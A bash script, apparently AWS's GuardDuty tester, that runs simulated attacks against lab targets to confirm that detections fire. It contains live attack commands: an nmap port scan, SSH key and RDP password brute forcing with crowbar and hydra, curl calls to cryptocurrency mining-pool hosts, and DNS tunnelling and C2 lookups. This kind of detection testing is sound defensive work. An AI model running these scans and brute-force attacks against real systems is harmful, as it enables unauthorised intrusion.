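#!/bin/bash
#Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
#
# guardduty_tester.sh - drives the GuardDuty tester environment.
#
# Each numbered section below generates traffic from this (red-team)
# instance toward the targets created by the accompanying templates so that
# GuardDuty raises the finding listed in the summary at the end. Target
# addresses and instance ids come from localIps.sh, which the templates
# write next to this script; every tool used here (nmap, crowbar, hydra,
# curl, dig) is expected on PATH or under the current directory.
#
# The shebang must be the very first line of the file for the kernel to
# honour it, which is why it now precedes the license header.
#
# Deliberately no `set -e`: the tests are independent and each one should
# still run when an earlier tool exits non-zero.

# load IP addresses created by templates
if [[ ! -f localIps.sh ]]; then
  printf 'guardduty_tester.sh: localIps.sh not found in %s (run the template first)\n' "$PWD" >&2
  exit 1
fi
# shellcheck source=/dev/null
source localIps.sh

# The two targets are used on command lines below; without them the scan
# and brute-force tools would run against an empty argument, so fail early.
: "${BASIC_LINUX_TARGET:?not set by localIps.sh}"
: "${BASIC_WINDOWS_TARGET:?not set by localIps.sh}"

# simulate external recon
#echo 'External port probe on a temporarily unprotected port'

# 1 - simulate internal recon and attempted lateral movement
echo
echo '***********************************************************************'
echo '* Test #1 - Internal port scanning *'
echo '* This siumulates internal reconaissance by an internal actor or an *'
echo '* external actor after an initial compromise. This is considered a *'
echo '* low priority finding for GuardDuty because its not a clear indicator*'
echo '* of malicious intent on its own. *'
echo '***********************************************************************'
echo
sudo nmap -sT "$BASIC_LINUX_TARGET"
echo
echo '-----------------------------------------------------------------------'
echo

# 2 - ssh brute force with list of keys found on web
echo '***********************************************************************'
echo '* Test #2 - SSH Brute Force with Compromised Keys *'
echo '* This siumulates an SSH brute force attack on an SSH port that we *'
echo '* can access from this instance. It uses (phony) compromised keys in *'
echo '* many subsequent attempts to see if one works. This is a common *'
echo '* techique where the bad actors will harvest keys from the web in *'
echo '* places like source code repositories where people accidentally leave*'
echo '* keys and credentials (This attempt will not actually succeed in *'
echo '* obtaining access to the target linux instance in this subnet) *'
echo '***********************************************************************'
echo
# Ten rounds of the same key list: the repetition is what makes the
# volume large enough for the brute-force detection.
for ((attempt = 1; attempt <= 10; attempt++)); do
  sudo ./crowbar/crowbar.py -b sshkey -s "$BASIC_LINUX_TARGET/32" -u ec2-user -k ./compromised_keys
done
echo
echo '-----------------------------------------------------------------------'
echo

# 3 - rdp brute force with known user and list of passwords found on web
echo '***********************************************************************'
echo '* Test #3 - RDP Brute Force with Password List *'
echo '* This siumulates an RDP brute force attack on the internal RDP port *'
echo '* of the windows server that we installed in the environment. It uses*'
echo '* a list of common passwords that can be found on the web. This test *'
echo '* will trigger a detection, but will fail to get into the target *'
echo '* windows instance. *'
echo '***********************************************************************'
echo
echo 'Sending 250 password attempts at the windows server...'
hydra -t 4 -f -l administrator -P ./passwords/password_list.txt "rdp://$BASIC_WINDOWS_TARGET"
echo
echo '-----------------------------------------------------------------------'
echo

# 4 - CryptoCurrency Activity
echo '***********************************************************************'
echo '* Test #4 - CryptoCurrency Mining Activity *'
echo '* This siumulates interaction with a cryptocurrency mining pool which *'
echo '* can be an indication of an instance compromise. In this case, we are*'
echo '* only interacting with the URL of the pool, but not downloading *'
echo '* any files. This will trigger a threat intel based detection. *'
echo '***********************************************************************'
echo
echo "Calling bitcoin wallets to download mining toolkits"
# Only the DNS resolution of the pool host matters for the finding; the
# requests run in the background and the script does not wait for them.
curl -s http://com.minergate.pool/dkjdjkjdlsajdkljalsskajdksakjdksajkllalkdjsalkjdsalkjdlkasj > /dev/null &
curl -s http://xdn-xmr.pool.minergate.com/dhdhjkhdjkhdjkhajkhdjskahhjkhjkahdsjkakjasdhkjahdjk > /dev/null &
echo
echo '-----------------------------------------------------------------------'
echo

# 5 - DNS Exfiltation
echo '***********************************************************************'
echo '* Test #5 - DNS Exfiltration *'
echo '* A common exfiltration technique is to tunnel data out over DNS *'
echo '* to a fake domain. Its an effective technique because most hosts *'
echo '* have outbound DNS ports open. This test wont exfiltrate any data, *'
echo '* but it will generate enough unusual DNS activity to trigger the *'
echo '* detection. *'
echo '***********************************************************************'
echo
echo "Calling large numbers of large domains to simulate tunneling via DNS"
# Backgrounded as well; the summary below may print before these lookups
# have all been sent.
dig -f ./domains/queries.txt > /dev/null &
echo

# 6 - Backdoor:EC2/C&CActivity.B!DNS
echo '***********************************************************************'
echo '* Test #6 - Fake domain to prove that GuardDuty is working *'
echo '* This is a permanent fake domain that customers can use to prove that*'
echo '* GuardDuty is working. Calling this domain will always generate the *'
echo '* Backdoor:EC2/C&CActivity.B!DNS finding type *'
echo '***********************************************************************'
echo
echo "Calling a well known fake domain that is used to generate a known finding"
dig GuardDutyC2ActivityB.com any
echo

# Summary of the findings each test is expected to produce in the
# GuardDuty console; the ids below are only echoed, never used as input.
echo '*****************************************************************************************************'
echo 'Expected GuardDuty Findings'
echo
echo 'Test 1: Internal Port Scanning'
echo 'Expected Finding: EC2 Instance ' "$RED_TEAM_INSTANCE" ' is performing outbound port scans against remote host.' "$BASIC_LINUX_TARGET"
echo 'Finding Type: Recon:EC2/Portscan'
echo
echo 'Test 2: SSH Brute Force with Compromised Keys'
echo 'Expecting two findings - one for the outbound and one for the inbound detection'
echo 'Outbound: ' "$RED_TEAM_INSTANCE" ' is performing SSH brute force attacks against ' "$BASIC_LINUX_TARGET"
echo 'Inbound: ' "$RED_TEAM_IP" ' is performing SSH brute force attacks against ' "$BASIC_LINUX_INSTANCE"
echo 'Finding Type: UnauthorizedAccess:EC2/SSHBruteForce'
echo
echo 'Test 3: RDP Brute Force with Password List'
echo 'Expecting two findings - one for the outbound and one for the inbound detection'
echo 'Outbound: ' "$RED_TEAM_INSTANCE" ' is performing RDP brute force attacks against ' "$BASIC_WINDOWS_TARGET"
echo 'Inbound: ' "$RED_TEAM_IP" ' is performing RDP brute force attacks against ' "$BASIC_WINDOWS_INSTANCE"
echo 'Finding Type : UnauthorizedAccess:EC2/RDPBruteForce'
echo
echo 'Test 4: Cryptocurrency Activity'
echo 'Expected Finding: EC2 Instance ' "$RED_TEAM_INSTANCE" ' is querying a domain name that is associated with bitcoin activity'
echo 'Finding Type : CryptoCurrency:EC2/BitcoinTool.B!DNS'
echo
echo 'Test 5: DNS Exfiltration'
echo 'Expected Finding: EC2 instance ' "$RED_TEAM_INSTANCE" ' is attempting to query domain names that resemble exfiltrated data'
echo 'Finding Type : Backdoor:EC2/DNSDataExfiltration'
echo
echo 'Test 6: C&C Activity'
echo 'Expected Finding: EC2 instance ' "$RED_TEAM_INSTANCE" ' is querying a domain name associated with a known Command & Control server. '
echo 'Finding Type : Backdoor:EC2/C&CActivity.B!DNS'
echo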